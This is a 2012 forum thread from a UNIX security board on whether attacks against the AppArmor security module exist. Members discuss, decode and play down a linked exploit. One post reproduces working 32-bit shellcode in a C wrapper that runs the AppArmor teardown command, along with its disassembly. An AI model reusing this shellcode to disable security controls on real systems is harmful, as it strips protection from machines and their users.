Attacks against AppArmor

Discussion in 'all things UNIX' started by ComputerSaysNo, Oct 15, 2012.

Thread Status:
Not open for further replies.
  1. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,425
    Are there any attacks against AppArmor in the wild?
     
  2. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Not in the wild. Local kernel exploits can defeat apparmor though. LSM isn't meant to restrict kernel processes.
     
  3. PhantomPhenix

    PhantomPhenix Registered Member

    Joined:
    Jul 24, 2010
    Posts:
    29

    -http://1337day.com/exploits/19130
     
  4. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    That's some nice shellcode there. Unfortunately I can't read assembly and I have no idea exactly how it works.
     
  5. PhantomPhenix

    PhantomPhenix Registered Member

    Joined:
    Jul 24, 2010
    Posts:
    29
    -http://lmgtfy.com/?q=Shellcode
     
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    That link won't teach him assembly.
     
  7. BrandiCandi

    BrandiCandi Guest

    I'm guessing that the script is a buffer overflow attempt because of that long string at the beginning "const char sc[] = "\x6a\x0b\x58\x31\blahblahblah" I can't think of any other reason to push such a long string into an assembly stack. But really that's just a guess. It could just be doing simple math for all I know. Assembly is kind of the opposite of pseudo-code.

    I've been trying to run assembly code on an emulator for another project but I can't get it to compile properly. :/

    Because I'm a dork I'll give you some definitions of assembly calls:

    Register Function
    eax Accumulator
    ebx (base index)
    ecx (count)
    edx (data)
    edi (destination index)
    esi (source index)
    ebp Frame pointer
    esp Stack top pointer
     
  8. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    I know what shellcode is, bro. I didn't ask for a definition. I said I can't read assembly (which is what shellcode is). Most people don't know assembly (even most developers). For one assembly depends on the CPU architecture (it will change depending on the hardware). There just aren't that many people who care or have a need to learn it.

    In any case, I ran the exploit by the lead developer of AppArmor. He wasn't impressed. First it only works on 32 bit and is limited to a specific OS version. And it only works when you're unconfined and the attacker has the ability to utilize the sys_mac_admin capability.

    So if an attacker has user access to your machine, then your AppArmor profiles are incorrect in the first place. And if he has this level of access, there really isn't much reason to tear down AppArmor because AppArmor is only used to confine network facing apps. If he is already on the machine, then there are a million more exploits he could run besides tearing down AppArmor.

    AppArmor is supposed to stop him from getting local user access in the first place. If you have the proper profiles set-up, this attack wont work.
     
  9. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    Thank you chronomatic :thumb:
     
  10. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    Architecture dependent. Assuming memory addresses ... well.
    You know how I feel about security science fiction.
    Mrk
     
  11. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    You mean like every shell code ever used.... ever?
     
  12. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    Not sure what you mean by that last sentence.
    Assembly instructions are not shell code, if that's what you infer.
    Mrk
     
  13. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I misunderstood. I meant that asm is always platform dependent. That's what I get for reading on my phone.
     
  14. NGRhodes

    NGRhodes Registered Member

    Joined:
    Jun 23, 2003
    Posts:
    2,331
    Location:
    West Yorkshire, UK

    That shell code is C and takes the string array (which is 80386 opcodes) and executes it inline.
     
  15. BrandiCandi

    BrandiCandi Guest

    Yeah, clearly I have no idea. It's C? Why does it look like assembly?
    Code:
    /etc/init.d/apparmor teardown
     
    const char sc[] = "\x6a\x0b\x58\x31\xd2\x52\x68\x64\x6f\x77\x6e\x68\x74\x65\x61\x72\x89\xe1"
    "\x52\x68\x72\x6d\x6f\x72\x68\x61\x70\x70\x61\x68\x74\x2e\x64\x2f\x68\x2f\x69\x6e\x69\x68\x2f"
    "\x65\x74\x63\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
     
    main(){
    int (*shell)();
    shell=sc;
    shell();
    }
     
    08048060 <_start>:
    8048060:    6a 0b                    push   $0xb
    8048062:    58                       pop    %eax
    8048063:    31 d2                    xor    %edx,%edx
    8048065:    52                       push   %edx
    8048066:    68 64 6f 77 6e           push   $0x6e776f64
    804806b:    68 74 65 61 72           push   $0x72616574
    8048070:    89 e1                    mov    %esp,%ecx
    8048072:    52                       push   %edx
    8048073:    68 72 6d 6f 72           push   $0x726f6d72
    8048078:    68 61 70 70 61           push   $0x61707061
    804807d:    68 74 2e 64 2f           push   $0x2f642e74
    8048082:    68 2f 69 6e 69           push   $0x696e692f
    8048087:    68 2f 65 74 63           push   $0x6374652f
    804808c:    89 e3                    mov    %esp,%ebx
    804808e:    52                       push   %edx
    804808f:    51                       push   %ecx
    8048090:    53                       push   %ebx
    8048091:    89 e1                    mov    %esp,%ecx
    8048093:    cd 80                    int    $0x80
     
  16. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    7,786
    It's C with inline assembler as mentioned above. The C code executes the asm code inline as part of a C program.
     
  17. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,425
    So is it a viable attack or not? How would you defend against it?
     
  18. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    Good question! Once again we see some random smattering of code, unsubstantiated as to how exactly it can deliver its payload from start to finish. Where on earth is a real life example of how this can circumvent the security defense in question?
     
  19. NGRhodes

    NGRhodes Registered Member

    Joined:
    Jun 23, 2003
    Posts:
    2,331
    Location:
    West Yorkshire, UK
    The assembly underneath is just there to show what the ASM code is before it is coverted into a string of opcodes, not actually part of the shell code which is just the string array and main c function (I think thats where you getting confused :)).
     
  20. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    What do you mean by viable attack?
    For example, rm is a powerful command that can do wonders.
    Does it make it into an attack vector? No.

    But if you run something stupid, you will regret it.
    Defend against what? Do you defend yourself against sharks?

    Mrk
     
  21. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    That one reminded me of something. If "you" really want to protect "yourself" against "sharks", always swim side by side with a killer wale. They will, at least, kill white sharks. Not sure if "you" will be safe from the killer wale itself, though. :D
     
  22. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Can sharks eat me via the internet? If so, holy **** yeah I'm gonna be afraid of sharks.
     
  23. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    The things is, people are imagining sharks. Like this absolutely trivial, unrelated example that needs local access and depends on a million factors. And then, all of a sudden, it not only becomes an attack, but a viable one, and there's a need to defend from it.

    No. Slow down. Stop. Nothing is happening. Nothing at all.

    Relax. Enjoy your computer and stop creating paranoia.

    I guess ignorance breeds fear. Or perhaps people have suffered so badly in their past they can't shake off the history. What they need though, is the ability to rationalize problems as if dissecting a lab rat. Analytical, precise, with statistical engineering approach, and then, ghosts and imaginary issues go away down the noise pipe.

    Mrk
     
  24. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Sharks are real. Hackers are real. One of them can attack me in the ocean and one can attack me from just about anywhere. Personally I'm a lot more afraid of a shark but it's not keeping me out of the ocean nor is a hacker keeping me offline.

    Yes, risk assessment is important. Whether an attack is viable or not is a very different question from whether an attack is likely or not ie: does it work vs will it happen.

    I don't think calling all attacks imaginary until you've seen it used against a computer is in any way informed or based on analysis. It's just as bad as being worried every time a vulnerability in some software is found.
     
  25. BrandiCandi

    BrandiCandi Guest

    Aha! Yes that had me completely baffled :D Thank you.

    Mr. K, It seems that you're lumping Vulnerability Assessment in with Risk Analysis. It's really incredibly simple:
    1. First you determine what vulnerabilities are present on your system. (Which is what folks are trying to do in this thread)
    2. Then you determine how likely they are to be exploited. (which you seem to be saying isn't likely. So give us FACTS if you know the conditions in which it works. Because it will work somewhere. It's ludicrous to say it doesn't work anywhere.)
    3. Then you defend the stuff that's likely to get attacked. (name a tool that you know will stop it. I'm guessing you have to allow it to execute on your box, so don't let untrusted stuff execute.)
    4. Done.

    Saying that there is no vulnerability when there is one, or asking people to ignore vulnerabilities... well it kinda chaps my little hiney. It's totally irresponsible and misleading.
     
Loading...
Thread Status:
Not open for further replies.